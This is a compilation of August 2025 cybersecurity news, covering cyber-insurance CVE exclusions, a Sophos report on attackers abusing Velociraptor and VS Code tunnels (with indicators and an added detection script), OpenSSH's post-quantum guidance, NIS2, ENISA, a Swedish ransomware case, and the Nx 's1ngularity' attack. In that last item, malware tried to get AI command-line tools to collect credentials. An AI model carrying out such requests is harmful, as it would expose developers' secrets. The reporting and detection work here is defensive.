darkreading.com Robert Lemos, Contributing Writer August 22, 2025 Some insurers look to limit payouts to companies that don't remediate serious vulnerabilities in a timely manner. Unsurprisingly, most companies don't like those restrictions. Cyber insurers are testing out new ways to hold policyholders accountable for outdated security, limiting payouts when policyholders fall prey to attacks that use older vulnerabilities or take advantage of holes in the organizations' defenses. Potential risk-limiting approaches include a sliding scale of accountability — and payouts — based on an unpatched vulnerability's half-life, or whether a company failed to fix a critical vulnerability within a certain number of days, according to a blog post penned by cyber insurer Coalition, which does not support such approaches. Dubbed CVE exclusions, after the Common Vulnerabilities and Exposures (CVE) system widely used to assign identifiers to software security issues, the tactic is not yet widely adopted, and most examples are from insurers outside the US, the firm stated. The limits could start showing up in companies' policies, however, if demand for cyber insurance continues to grow, creating a seller's market, says John Coletti, head of cyber underwriting at Coalition. "While we will not name names, there are specific examples of this occurring within the industry," he says. "A company should be highly skeptical of buying a policy with a CVE exclusion." Cyber-insurance firms are struggling to find different ways to limit their vulnerability to large breaches and campaigns that hit a large number of policyholders. Following NotPetya, when companies used business insurance to cover disruptions to operations, efforts to deny payouts based on warlike-act exclusion clauses largely failed but led to enhanced wording in subsequent policies. 
Increasingly, cyber-insurance firms used data from policyholders or gleaned from cybersecurity assessments, or information from their own managed security services offerings to better determine risk. Blame the Victim? Yet requiring all companies to manage major vulnerabilities is a tall order. Currently, the software industry is on track to disclose more than 46,000 vulnerabilities in 2025, up from nearly 40,000 in 2024, according to the National Vulnerability Database (NVD). Of those, likely 30% would be considered of high or critical severity, typically defined as a Common Vulnerability Scoring System (CVSS) score of 8.0 or higher.
Google previews cyber ‘disruption unit’ as U.S. government, industry weigh going heavier on offense | CyberScoop
cyberscoop.com article By Tim Starks August 27, 2025 Google says it is starting a cyber “disruption unit,” a development that arrives in a potentially shifting U.S. landscape toward more offensive-oriented approaches in cyberspace. But the contours of that larger shift are still unclear, and whether or to what extent it’s even possible. While there’s some momentum in policymaking and industry circles to put a greater emphasis on more aggressive strategies and tactics to respond to cyberattacks, there are also major barriers. Sandra Joyce, vice president of Google Threat Intelligence Group, said at a conference Tuesday that more details of the disruption unit would be forthcoming in future months, but the company was looking for “legal and ethical disruption” options as part of the unit’s work. “What we’re doing in the Google Threat Intelligence Group is intelligence-led proactive identification of opportunities where we can actually take down some type of campaign or operation,” she said at the Center for Cybersecurity Policy and Law event, where she called for partners in the project. “We have to get from a reactive position to a proactive one … if we’re going to make a difference right now.” The boundaries in the cyber domain between actions considered “cyber offense” and those meant to deter cyberattacks are often unclear. The tradeoff between “active defense” vs. “hacking back” is a common dividing line. On the less aggressive end, “active defense” can include tactics like setting up honeypots designed to lure and trick attackers. At the more extreme end, “hacking back” would typically involve actions that attempt to deliberately destroy an attacker’s systems or networks. Disruption operations might fall between the two, like Microsoft taking down botnet infrastructure in court or the Justice Department seizing stolen cryptocurrency from hackers. Trump administration officials and some in Congress have been advocating for the U.S. 
government to go on offense in cyberspace, saying that foreign hackers and criminals aren’t suffering sufficient consequences. Much-criticized legislation to authorize private sector “hacking back” has long stalled in Congress, but some have recently pushed a version of the idea where the president would give “letters of marque” like those for early-U.S. sea privateers to companies authorizing them to legally conduct offensive cyber operations currently forbidden under U.S. law. The private sector has some catching up to do if there’s to be a worthy field of firms able to focus on offense, experts say. John Keefe, a former National Security Council official from 2022 to 2024 and National Security Agency official before that, said there had been government talks about a “narrow” letters of marque approach “with the private sector companies that we thought had the capabilities.” The concept was centered on ransomware, Russia and rules of the road for those companies to operate. “It wasn’t going to be the Wild West,” said Keefe, now founder of Ex Astris Scientia, speaking like others in this story at Tuesday’s conference. The companies with an emphasis on offense largely have only one customer — and that’s governments, said Joe McCaffrey, chief information security officer at defense tech company Anduril Industries. “It’s a really tough business to be in,” he said. “If you develop an exploit, you get to sell to one person legally, and then it gets burned, and you’re back again.” By their nature, offensive cyber operations in the federal government are already very time- and manpower-intensive, said Brandon Wales, a former top official at the Cybersecurity and Infrastructure Security Agency and now vice president of cybersecurity at SentinelOne. Private sector companies could make their mark by innovating ways to speed up and expand the number of those operations, he said. 
Overall, among the options of companies that could do more offensive work, the “industry doesn’t exist yet, but I think it’s coming,” said Andrew McClure, managing director at Forgepoint Capital. Certainly Congress would have to clarify what companies are able to do legally as well, Wales said. But that’s just the industry side. There’s plenty more to weigh when stepping up offense. “However we start, we need to make sure that we are having the ability to measure impact,” said Megan Stifel, chief strategy officer for the Institute for Security and Technology. “Is this working? How do we know?” If there was a consensus at the conference it’s that the United States — be it the government or private sector — needs to do more to deter adversaries in cyberspace by going after them more in cyberspace. One knock on that idea has been that the United States can least afford to get into a cyber shooting match, since it’s more reliant on tech than other nations and an escalation would hurt the U.S. the most by presenting more vulnerable targets for enemies. But Dmitri Alperovitch, chairman of the Silverado Policy Accelerator, said that idea was wrong for a couple reasons, among them that other nations have become just as reliant on tech, too. And “the very idea that in this current bleak state of affairs, engaging in cyber offense is escalatory, I propose to you, is laughable,” he said. “After all, what are our adversaries going to escalate to in response? Ransom more of our hospitals, penetrate more of our water and electric utilities, steal even more of our IP and financial assets?” Alperovitch continued: “Not only is engaging in thoughtful and careful cyber offense not escalatory, but not doing so is.”
Velociraptor incident response tool abused for remote access
news.sophos.com Written by Sophos Counter Threat Unit Research Team August 26, 2025
This approach represents an evolution from threat actors abusing remote monitoring and management tools.
In August 2025, Counter Threat Unit™ (CTU) researchers investigated an intrusion that involved deployment of the legitimate open-source Velociraptor digital forensics and incident response (DFIR) tool. In this incident, the threat actor used the tool to download and execute Visual Studio Code with the likely intention of creating a tunnel to an attacker-controlled command and control (C2) server. Enabling the tunnel option in Visual Studio Code triggered a Taegis™ alert, as this option can allow both remote access and remote code execution and has been abused by multiple threat groups in the past.
The threat actor used the Windows msiexec utility to download an installer (v2.msi) from a Cloudflare Workers domain (files[.]qaubctgg[.]workers[.]dev). This location appears to be a staging folder for attacker tools, including the Cloudflare tunneling tool and the Radmin remote administration tool. This file installed Velociraptor, which is configured to communicate with C2 server velo[.]qaubctgg[.]workers[.]dev. The attacker then used an encoded PowerShell command to download Visual Studio Code (code.exe) from the same staging folder and executed it with the tunnel option enabled. The threat actor installed code.exe as a service and redirected the output to a log file. They then used the msiexec Windows utility again to download additional malware (sc.msi) from the workers[.]dev folder (see Figure 1).
Figure 1: Process tree showing Velociraptor creating Visual Studio Code tunnel.
The Visual Studio Code tunneling activity triggered a Taegis alert that prompted a Sophos investigation. The analysts provided mitigation advice that enabled the customer to quickly implement remediations such as isolating the affected host, which prevented the attacker from achieving their objectives. Analysis suggests that the malicious activity would likely have led to ransomware deployment.
Threat actors often abuse remote monitoring and management (RMM) tools. In some instances, they leverage preexisting tools on the targeted systems. In others, they deploy the tools during the attack. The Velociraptor incident reveals attackers pivoting to using incident response tools to gain a foothold in a network and minimize the amount of malware they deploy.
Organizations should monitor for and investigate unauthorized use of Velociraptor and treat observations of this tradecraft as a precursor to ransomware. Implementing an endpoint detection and response system, monitoring for unexpected tools and suspicious behaviors, and following best practices for securing systems and generating backups can mitigate the ransomware threat. The impact of an attack is greatly reduced if it is caught prior to ransomware deployment.
The following Sophos protections detect activity related to this threat:
- Troj/Agent-BLMR
- Troj/BatDl-PL
- Troj/Mdrop-KDK
To mitigate exposure to this malware, CTU™ researchers recommend that organizations use available controls to review and restrict access using the indicators listed in Table 1. The domains may contain malicious content, so consider the risks before opening them in a browser.
| Indicator | Type | Context |
|---|---|---|
| files[.]qaubctgg[.]workers[.]dev | Domain name | Hosted tools used in August 2025 Velociraptor campaign |
| velo[.]qaubctgg[.]workers[.]dev | Domain name | C2 server used in August 2025 Velociraptor campaign |
Table 1: Indicators for this threat.
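The monitoring advice above can be turned into a first-pass triage over process-creation telemetry. This is an added example, not Sophos or Taegis detection logic; the event field names, rule names, host names and sample events are constructed, and the Velociraptor check assumes the binary has not been renamed.

```python
"""Triage process-creation events for the tradecraft in the write-up (added example)."""
import ntpath
import re

URL = re.compile(r"https?://", re.I)


def _base(path):
    """Lower-cased file name of a Windows path."""
    return ntpath.basename(path).lower()


def _is_encoded_powershell(image, args):
    if _base(image) not in ("powershell.exe", "pwsh.exe"):
        return False
    # PowerShell accepts any prefix of -EncodedCommand (-e, -en, -enc, ...) and -ec.
    return any(t == "-ec" or (len(t) >= 2 and "-encodedcommand".startswith(t))
               for t in (a.lower() for a in args))


def match_rules(event):
    """Return the names of the behaviours from the write-up that this event shows."""
    image = _base(event["image"])
    parent = _base(event["parent_image"])
    # Naive whitespace split: enough for the constructed samples below.
    args = event["command_line"].split()[1:]
    hits = []
    if image == "msiexec.exe" and URL.search(event["command_line"]):
        hits.append("msiexec_remote_package")
    if image == "code.exe" and "tunnel" in (a.lower() for a in args):
        hits.append("vscode_tunnel")
    if _is_encoded_powershell(event["image"], args):
        hits.append("powershell_encoded_command")
    if hits and parent.startswith("velociraptor"):
        hits.append("spawned_by_velociraptor")
    return hits


def triage(events, approved_velociraptor_hosts):
    """Map host -> (level, sorted rule names); Velociraptor off the approved list escalates."""
    per_host = {}
    for ev in events:
        entry = per_host.setdefault(ev["host"], {"rules": set(), "unapproved": False})
        entry["rules"].update(match_rules(ev))
        names = (_base(ev["image"]), _base(ev["parent_image"]))
        if (any(n.startswith("velociraptor") for n in names)
                and ev["host"] not in approved_velociraptor_hosts):
            entry["unapproved"] = True
    report = {}
    for host, entry in per_host.items():
        remote_access = {"vscode_tunnel", "msiexec_remote_package"} & entry["rules"]
        if entry["unapproved"] and remote_access:
            level = "high"
        elif entry["rules"] or entry["unapproved"]:
            level = "review"
        else:
            level = "none"
        report[host] = (level, sorted(entry["rules"]))
    return report


def _ev(host, parent, image, command_line):
    return {"host": host, "parent_image": parent, "image": image,
            "command_line": command_line}


# Constructed events; hosts, paths and the placeholder domain are not from the incident.
APPROVED = {"IR-LAB-01"}
SAMPLE_EVENTS = [
    _ev("WS-042", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\msiexec.exe",
        "msiexec.exe /q /i https://files.example.invalid/v2.msi"),
    _ev("WS-042", r"C:\Program Files\Velociraptor\Velociraptor.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "powershell.exe -enc BASE64_PLACEHOLDER"),
    _ev("WS-042", r"C:\Program Files\Velociraptor\Velociraptor.exe",
        r"C:\ProgramData\code.exe", "code.exe tunnel"),
    _ev("IR-LAB-01", r"C:\Program Files\Velociraptor\Velociraptor.exe",
        r"C:\Windows\System32\cmd.exe", "cmd.exe /c hostname"),
    _ev("DEV-007", r"C:\Windows\explorer.exe",
        r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\bin\code.exe",
        "code.exe tunnel"),
]

if __name__ == "__main__":
    for host, verdict in triage(SAMPLE_EVENTS, APPROVED).items():
        print(host, verdict)
```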
openssh.com - OpenSSH supports a number of cryptographic key agreement algorithms considered to be safe against attacks from quantum computers. We recommend that all SSH connections use these algorithms. OpenSSH has offered post-quantum key agreement (KexAlgorithms) by default since release 9.0 (April 2022), initially via the sntrup761x25519-sha512 algorithm. More recently, in OpenSSH 9.9, we have added a second post-quantum key agreement mlkem768x25519-sha256 and it was made the new default scheme in OpenSSH 10.0 (April 2025). To encourage migration to these stronger algorithms, OpenSSH 10.1 will warn the user when a non post-quantum key agreement scheme is selected, with the following message: WARNING: connection is not using a post-quantum key exchange algorithm. This session may be vulnerable to "store now, decrypt later" attacks. The server may need to be upgraded. See https://openssh.com/pq.html This warning is displayed by default but may be disabled via the WarnWeakCrypto option in ssh_config(5). Background A quantum computer (QC) is a device capable of performing computations with information encoded as quantum states. Such a device could quickly solve particular problems that are intractable for existing "classical" computers. The mathematics that underpin a number of cryptographic algorithms are among the problems that quantum computers are believed to be able to effectively solve. This means that a sufficiently-powerful quantum computer (a.k.a a "cryptographically-relevant" quantum computer) will be able to break them. Most affected is the cryptography used for key agreement and digital signatures, both of which play important roles in SSH. Fortunately, quantum computers of sufficient power to break cryptography have not been invented yet. Estimates for when a cryptographically-relevant quantum computer will arrive, based on the rate of progress in the field, range from 5-20 years, with many observers expecting them to arrive in the mid-2030s. 
The entire privacy of an SSH connection depends on cryptographic key agreement. If an attacker can break the key agreement then they are able to decrypt and view the entire session. The attacker need not perform this attack in real time; they may collect encrypted SSH sessions now and then decrypt them later once they have access to a quantum computer. This is referred to as a "store now, decrypt later" attack (also as "harvest now, decrypt later").

Fortunately, improved "post-quantum" cryptographic algorithms have been devised that rely on different underlying mathematical problems that are understood to not be attackable by a quantum computer. OpenSSH has supported post-quantum key agreement to prevent "store now, decrypt later" attacks for several years and it has been the default since OpenSSH-9.0, released in 2022.

FAQ

I received a warning from ssh that directed me to this page. What should I do?

As mentioned above, OpenSSH 10.1 started warning users when connections use cryptography that is not safe against quantum computers. If you received such a warning, it means that the server you connected to did not offer one of the two post-quantum key agreement algorithms that are being standardised for the SSH protocol: mlkem768x25519-sha256 and sntrup761x25519-sha512.

The ideal solution is to update the server to use an SSH implementation that supports at least one of these. OpenSSH versions 9.0 and greater support sntrup761x25519-sha512 and versions 9.9 and greater support mlkem768x25519-sha256. If your server is already running one of these versions, then check whether the KexAlgorithms option has disabled their use.

If you are unable to update the server and/or you prefer to accept the risk of continuing to use quantum-unsafe cryptography then the warning may be silenced via the WarnWeakCrypto option in ssh_config(5). We recommend doing this selectively, for example:

    Match host unsafe.example.com
        WarnWeakCrypto no

Quantum computers don't exist yet, why go to all this trouble?

Because of the "store now, decrypt later" attack mentioned above. Traffic sent today is at risk of decryption unless post-quantum key agreement is used.

What about signature algorithms? You said they were at risk too

Yes, most currently-used signature algorithms (including RSA and ECDSA) can be broken by a quantum computer. However, there is no risk to existing traffic in this situation (i.e. there is no analogous "store now, decrypt later"). The only urgency for signature algorithms is ensuring that all classical signature keys are retired in advance of cryptographically-relevant quantum computers becoming a reality. OpenSSH will add support for post-quantum signature algorithms in the future.

I don't believe we'll ever get quantum computers. This is a waste of time

Some people consider the task of scaling existing quantum computers up to the point where they can tackle cryptographic problems to be practically insurmountable. This is a possibility. However, it appears that most of the barriers to a cryptographically-relevant quantum computer are engineering challenges rather than underlying physics.

If we're right about quantum computers being practical, then we will have protected vast quantities of user data. If we're wrong about it, then all we'll have done is moved to cryptographic algorithms with stronger mathematical underpinnings.

These post-quantum algorithms are new. Are we sure they aren't broken?

We're wary of this too. Though post-quantum key agreement algorithms have received a lot of concerted cryptographic attention over the last few years, it's possible that new attacks might be found.

To defend against this happening we have selected post-quantum algorithms with good safety margins. This means that even if they turn out to be weaker than expected they are still likely to be strong enough to be considered fit for purpose.

Additionally, all the post-quantum algorithms implemented by OpenSSH are "hybrids" that combine a post-quantum algorithm with a classical algorithm. For example mlkem768x25519-sha256 combines ML-KEM, a post-quantum key agreement scheme, with ECDH/x25519, a classical key agreement algorithm that was formerly OpenSSH's preferred default. This ensures that the combined, hybrid algorithm is no worse than the previous best classical algorithm, even if the post-quantum algorithm turns out to be completely broken by future cryptanalysis.
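The condition the FAQ describes (a server that does not offer either post-quantum key agreement name) can be checked from the server's SSH_MSG_KEXINIT message, which is sent in the clear before encryption starts. The following is an added example, not code from OpenSSH or from the page: it parses a KEXINIT packet in the layout defined by the SSH transport protocol and reports which offered names are post-quantum. The two sample packets are constructed inline, and the `@openssh.com` alias is an assumption beyond the page.

```python
import struct

SSH_MSG_KEXINIT = 20
# Post-quantum hybrid key agreement names listed in the FAQ above.
PQ_KEX = {"mlkem768x25519-sha256", "sntrup761x25519-sha512"}
# Assumption beyond the page: vendor-suffixed name under which OpenSSH
# shipped the sntrup761 hybrid before the unsuffixed name was assigned.
PQ_KEX_ALIASES = {"sntrup761x25519-sha512@openssh.com"}

NAME_LIST_FIELDS = (
    "kex_algorithms", "server_host_key_algorithms",
    "encryption_algorithms_client_to_server",
    "encryption_algorithms_server_to_client",
    "mac_algorithms_client_to_server", "mac_algorithms_server_to_client",
    "compression_algorithms_client_to_server",
    "compression_algorithms_server_to_client",
    "languages_client_to_server", "languages_server_to_client",
)


class KexInitError(ValueError):
    """Raised when the bytes are not a well-formed KEXINIT message."""


def read_name_list(buf, off):
    """Read one name-list: uint32 length, then comma-separated ASCII names."""
    if off + 4 > len(buf):
        raise KexInitError("truncated name-list length")
    (n,) = struct.unpack_from(">I", buf, off)
    off += 4
    if off + n > len(buf):
        raise KexInitError("name-list overruns payload")
    try:
        text = buf[off:off + n].decode("ascii")
    except UnicodeDecodeError as exc:
        raise KexInitError("name-list is not ASCII") from exc
    return (text.split(",") if text else []), off + n


def unwrap_packet(packet):
    """Strip the unencrypted binary-packet framing and return the payload."""
    if len(packet) < 5:
        raise KexInitError("packet shorter than its header")
    length, pad = struct.unpack_from(">IB", packet, 0)
    if length + 4 > len(packet) or pad + 1 > length:
        raise KexInitError("inconsistent packet_length / padding_length")
    return packet[5:5 + length - pad - 1]


def parse_kexinit_payload(payload):
    """Return the ten KEXINIT name-lists keyed by field name."""
    if len(payload) < 17 or payload[0] != SSH_MSG_KEXINIT:
        raise KexInitError("not an SSH_MSG_KEXINIT payload")
    off = 17  # message byte + 16-byte cookie
    fields = {}
    for name in NAME_LIST_FIELDS:
        fields[name], off = read_name_list(payload, off)
    if off + 5 > len(payload):
        raise KexInitError("missing first_kex_packet_follows / reserved")
    fields["first_kex_packet_follows"] = payload[off] != 0
    return fields


def assess(payload):
    """Report which key agreement names in a server KEXINIT are post-quantum."""
    offered = parse_kexinit_payload(payload)["kex_algorithms"]
    pq = [k for k in offered if k in PQ_KEX or k in PQ_KEX_ALIASES]
    return {"offered": offered, "post_quantum": pq,
            "quantum_safe_possible": bool(pq)}


def build_kexinit(kex_names):
    """Build a KEXINIT packet for the demo (constructed sample, not a capture)."""
    def name_list(names):
        data = ",".join(names).encode("ascii")
        return struct.pack(">I", len(data)) + data
    lists = [kex_names, ["ssh-ed25519"], ["aes128-ctr"], ["aes128-ctr"],
             ["hmac-sha2-256"], ["hmac-sha2-256"], ["none"], ["none"], [], []]
    payload = (bytes([SSH_MSG_KEXINIT]) + bytes(16)
               + b"".join(name_list(x) for x in lists)
               + b"\x00" + struct.pack(">I", 0))
    pad = 8 - ((5 + len(payload)) % 8)
    if pad < 4:  # the protocol requires at least four bytes of padding
        pad += 8
    return struct.pack(">IB", len(payload) + pad + 1, pad) + payload + bytes(pad)


# Constructed samples: one server offering both names from the FAQ, one
# offering only classical key agreement (the case the FAQ's warning covers).
MODERN_SERVER = build_kexinit(
    ["mlkem768x25519-sha256", "sntrup761x25519-sha512", "curve25519-sha256"])
LEGACY_SERVER = build_kexinit(
    ["curve25519-sha256", "diffie-hellman-group14-sha256"])

if __name__ == "__main__":
    for label, pkt in (("modern", MODERN_SERVER), ("legacy", LEGACY_SERVER)):
        result = assess(unwrap_packet(pkt))
        print(label, result["post_quantum"] or "no post-quantum key agreement offered")
```

A server that does list one of these names can still end up on a classical algorithm if the client does not offer or does not prefer it, so the client's own KexAlgorithms setting needs the same check.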
I am a Swiss company. Am I affected by NIS2?
incyber.org Marie De Freminville 26.08.25 The NIS2 (Network and Information Security 2) directive, adopted by the European Union, was to be transposed into national law by each EU member state by October 2024 at the latest, with transposition processes and timetables specific to each country. Given the rise in cyber threats, it imposes stricter standards for cybersecurity, risk management and incident response than the NIS directive, which dates from 2016.

This new directive broadens both the expectations and the scope of application. Its aim is to anticipate new forms of attack, to move from a reactive approach to a proactive strategy, and to establish extended collaboration across the whole ecosystem in order to ensure the resilience of critical infrastructure. Its scope is wider and extends to entities considered essential or important (e.g. energy, transport, health, digital infrastructure, public administration, etc.). For more details, see https://monespacenis2.cyber.gouv.fr/directive/.

NIS2 is not directly applicable in Switzerland. Nevertheless, a Swiss company is affected, in particular if it is part of the critical supply chain of European Union companies subject to NIS2, for example as a provider of digital services or of cross-border critical infrastructure, or if it operates within the European Union through a subsidiary that falls within the scope of NIS2 (the scope mentioned above). Beyond strict compliance, adherence to European standards in the digital field is a pillar of trust between Swiss companies and their European partners or customers, and applying these standards will strengthen the security of the Swiss entities that comply with them.

The main questions to ask: Does my company have a subsidiary, branch or legal entity in an EU country? Does my company provide services to customers located in the EU (companies, states, critical infrastructure)? Does my company host, process or transport data of European citizens? Does my company operate in an "essential" sector (energy, health, banking, transport, digital infrastructure, water, space, public administration) or an important one (agri-food, digital services, research, chemicals, waste, critical manufacturing)?

If the Swiss company meets one of these criteria, or if the contract binding it to its customer contains NIS2 compliance obligations, it must make sure that its cybersecurity arrangements include in particular: a clearly identified CISO or cybersecurity officer; a formal cybersecurity policy, approved by management; an incident management procedure (notification ≤ 24h); regular risk analyses, audits and tests aimed at verifying the robustness of the arrangements; cybersecurity training for board members and executives.

In the financial sector, banking institutions that have a subsidiary or branch in the EU, or that act as a subcontractor or partner of European banks or actors, will have to put in place: cybersecurity governance at board level, appointing a cybersecurity officer (CISO) at executive level, revising the cybersecurity strategy and setting up an IT security committee; a mapping and management of risks related to the security of information systems, identifying the assets essential to the bank's operation and including the supply chain, IT suppliers and interconnections; incident notification procedures with very short deadlines (24 hours), and a cyber incident response plan; compliance audits, and a dashboard (tracking of security indicators and NIS2 requirements); a check of the cybersecurity maturity of providers of digital banking services, IT, cloud, etc., that is, requiring them to meet NIS2 standards; an awareness and training programme for employees, executives and the board of directors; an update of contracts with IT suppliers, and a check of subcontractors' security levels.

The banking sector is already heavily regulated: FINMA (the financial market authority in Switzerland) imposes strict requirements through its circulars, such as 2018/3 "Outsourcing" and 2023/1 "IT risk management", based on risk and proportionality. The initiatives of the Confederation (NCSC) also follow a logic of alignment with European standards.

Other essential entities in the financial sector are the FMIs (Financial Market Infrastructures): trading venues (stock exchanges, MTF - Multi Trading Facilities, OTF - Organised Trading Facilities, quotation systems), clearing houses (CCP), central securities depositories (CSD), settlement systems, providers of critical benchmarks, and regulated market data operators. In Switzerland, these entities include actors such as SIX Group, SIX x-clear, SIX SIS and Swiss Interbank Clearing (SIC), which run systems that are critical nationally but also interconnected with the EU.

Although Switzerland is not directly subject to NIS2, its FMIs operate internationally, particularly in the EU, and process critical financial data that is often shared with European counterparties. Although they are already subject to rigorous regulation, such as LFIN, LBVM, the financial market infrastructure regulation, FINMA directives, ISO 27001/22301 standards, etc., Swiss FMIs will have to demonstrate compliance equivalent to the NIS2 requirements, even if only contractually or operationally.

In the health sector, hospitals and clinics, laboratories, critical care providers, medical technology companies (eHealth, MedTech, telemedicine) and IT providers (health cloud, DMP, medical data platforms) that collaborate with the EU are considered essential entities (Annex I of NIS2). As in the banking industry, companies in this sector have new obligations and must be able to produce the following documents: health cybersecurity policy (with NIS2 requirements); IT / DMP / IoMT risk analysis; incident notification procedure; compliance register / dashboard; audit reports / remediation plans; awareness / training attestations.

In the energy sector, network operators, producers, suppliers and technical service providers (e.g. SCADA: industrial supervision systems, OT: operational technology, industrial cloud) must comply with NIS2 to the extent that they have to meet the expectations of European partners and European authorities, with the objective of strengthening the resilience of critical infrastructure. In addition, companies in this sector must anticipate the evolution of Swiss law (LSI, OICN, etc.), which is to converge with NIS2 through the Ordinance on the protection of critical infrastructure (OICN) and the directives of the OFEN and the NCSC.

The particularities of the energy sector are as follows: include OT, production, suppliers and remote management in the security policy; create an interdisciplinary cybersecurity committee with representatives from IT, OT, operations and compliance; map critical systems: automated supervision, distributed control, distribution networks, high-voltage substations, infrastructure shared with the EU; strengthen security measures on industrial IT systems (in particular separation of environments and access control), detect incidents, put in place a business continuity / recovery plan, and review IT supplier contracts to add an NIS2 compliance clause; train board members and executives, but also industrial and IT operators.

In the transport sector, the NIS2 directive covers all critical forms of transport: air (airlines, airport operators, air traffic control), rail (rail operators, infrastructure managers, signalling services), maritime (ports, shipping companies, navigation systems, freight operators), and road (motorway companies, traffic management, essential logistics platforms; lower priority but possible depending on the member state).

Switzerland, being closely interconnected with European networks, is a party to cross-border agreements (e.g. European rail transport, aviation safety with EASA, logistics corridors). It is subject to its own cybersecurity frameworks (e.g. OICN, LSI, requirements of the Federal Office of Transport, OFT) and its transport companies are therefore strongly encouraged to align voluntarily with NIS2, and in particular to secure industrial systems (isolation, network segmentation, SCADA monitoring) and to identify the systems interconnected with the EU.

Finally, Swiss digital infrastructure is closely interconnected with that of the EU (Internet interconnection, IP transit, European clouds, cross-border networks), and it is likely to host or transport European data (in the case of cloud actors or global digital services). It is subject to the Information Security Act (LSI), the Telecommunications Act (LTC), and the recommendations of the NCSC and SEFRI, which are a central pillar of the NIS2 directive. Swiss digital infrastructure providers (providers of ser...
ENISA receives 36 million euros to strengthen the response to cyber crises
www.usine-digitale.fr Alice Vitard 26 August 2025 Under the Cyber Solidarity Act, the European Union Agency for Cybersecurity is entrusted with managing the European cybersecurity reserve. With a budget of 36 million euros, it is responsible for selecting and coordinating providers able to intervene in the event of large-scale incidents.

The European Commission and the European Union Agency for Cybersecurity (ENISA) announced on 26 August that they had signed a contribution agreement entrusting ENISA with the administration and operation of the European cybersecurity reserve. A budget of 36 million euros over three years has been allocated to it for this purpose.

Responding to large-scale incidents

This reserve is provided for in Article 14 of the Cyber Solidarity Act, a text adopted in 2024 to give the Union strengthened means to detect, prepare for and respond to large-scale cyberattacks. It is meant to give the EU common capabilities for responding to major incidents.

In practice, the reserve is designed as a support mechanism that can be mobilised in the event of a significant cross-border incident. It relies on a network of trusted managed service providers, pre-selected through public calls for tenders. These providers can intervene to contain an attack, ensure continuity of service or support post-incident recovery.

Note that the scheme includes a flexibility clause. If the pre-committed services are not used for incident response, they can be converted into preparedness services (security tests, crisis exercises and resilience audits).

The reserve is open to a range of actors

In detail, the reserve will be open to the critical sectors defined by the NIS 2 directive, and to the institutions, agencies and bodies of the EU. Under certain conditions, third countries associated with the "Digital Europe" programme will also be able to access it.

ENISA is entrusted with four tasks: launching and managing the public procurement to select providers, assessing requests for assistance from member states, forwarding requests from third countries to the European Commission for validation, and monitoring and controlling the delivery of the services provided by the service providers.

The contribution agreement provides for funding of 36 million euros over three years. These funds come on top of the annual budget of 26.9 million euros. They are aligned with the period over which the services are made available. Their use is controlled by the European executive.

Filling the gap in coordinated response

By pooling resources, the European reserve aims to fill a long-standing gap: the absence of a coordinated response capability for large-scale attacks. In this context, the Cyber Solidarity Act also provides for the deployment of cross-border SOCs as well as specific European funding to support member states in building up their IT security capabilities.
Hundreds of Swedish municipalities impacted by suspected ransomware attack on IT supplier
therecord.media Alexander Martin August 27th, 2025 A suspected ransomware attack on a Swedish software provider is believed to have impacted around 200 of the country’s municipal governments. A suspected ransomware attack on Miljödata, a Swedish software provider used for managing sick leave and similar HR reports, is believed to have impacted around 200 of the country’s municipal governments. The attack was detected on Saturday, according to the company’s chief executive Erik Hallén. The attackers are attempting to extort Miljödata, police told local newspaper BLT. Swedish Minister for Civil Defence Carl-Oskar Bohlin wrote in a short update on social media: “The scope of the incident has not yet been clarified, and it is too early to determine the actual consequences.” Hallén told Swedish press agency TT that around 200 municipalities and regions were affected by the incident. Sweden has 290 municipalities and 21 regions. Several regional governments have confirmed using Miljödata systems to handle employee data, including “for example, medical certificates, rehabilitation plans, work-related injuries, and more,” according to the local government of the island of Gotland. Hallén reportedly said Miljödata was “working very intensively with external experts to investigate what happened, what and who was affected, and to restore system functionality.” “The government is receiving ongoing information about the incident and is in close contact with the relevant authorities,” Bohlin, the civil defense minister, said. “CERT-SE, which has the task of supporting Swedish society in handling and preventing IT security incidents, has offered advice and support to both the company in question and the affected customers,” the minister added. “The national cybersecurity center is coordinating the measures of the relevant authorities. 
A police investigation is also underway.” He stressed the incident underscored the need for high levels of cybersecurity throughout society, and said the Swedish government planned to present a new cybersecurity bill to the Swedish parliament in the near future “that will impose increased requirements on a wide range of actors.”
Thousands of Developer Credentials Stolen in macOS “s1ngularity” Attack
https://hackread.com by Deeba Ahmed August 28, 2025 A supply chain attack called “s1ngularity” on Nx versions 20.9.0-21.8.0 stole thousands of macOS developer credentials with the help of AI tools. A sophisticated cyberattack, dubbed the “s1ngularity” attack, has compromised Nx, a popular build platform widely used by software developers. The attack, which began on August 26, 2025, is a supply chain attack, a type of security breach where hackers sneak malicious code into a widely used piece of software, which then infects all the people who use it. The attack was designed to steal a wide variety of sensitive data, including GitHub tokens, npm authentication keys, and SSH private keys. These credentials are essentially digital keys that provide access to a user’s accounts and systems. The malicious software also went a step further, targeting API keys for popular AI tools like Gemini, Claude, and Q, demonstrating a new focus on emerging technologies. In addition to stealing data, the attackers installed a destructive payload that modified users’ terminal startup files, causing their terminal sessions to crash. GitGuardian’s analysis shared with Hackread.com revealed some surprising details about the attack and its victims. The firm found that 85% of the infected systems were running macOS, highlighting the attack’s particular impact on the developer community, which frequently uses Apple computers. In a curious turn, GitGuardian found that of the hundreds of systems where AI tools were targeted, many of the AI clients unexpectedly resisted the malicious requests. They either outright refused to run the commands or gave responses suggesting they knew they were being asked to do something wrong, showing a potential, though unintentional, new layer of security. The stolen credentials were not only valuable but also widespread. 
GitGuardian’s monitoring platform, which tracks public GitHub activity, discovered 1,346 repositories used by the attackers to store stolen data. To avoid detection, the attackers double-encoded the stolen data before uploading it. This number is far higher than the ten publicly visible repositories, as GitHub was quickly working to delete the rest. An analysis of these repositories revealed 2,349 distinct secrets, with over 1,000 still valid and working at the time of the report. The most common secrets were for GitHub and popular AI platforms. For anyone who used the malicious Nx versions 20.9.0 through 21.8.0, the most crucial step is to immediately assume that their credentials have been exposed. GitGuardian has created a free service called HasMySecretLeaked that allows developers to check for compromised credentials without ever revealing their actual keys. This attack reminds us that simply deleting a compromised file is not enough; the actual secret keys and tokens must be revoked and rotated to prevent further access by the attackers.
Swiss hospitals join forces against cyber-attacks - SWI swissinfo.ch
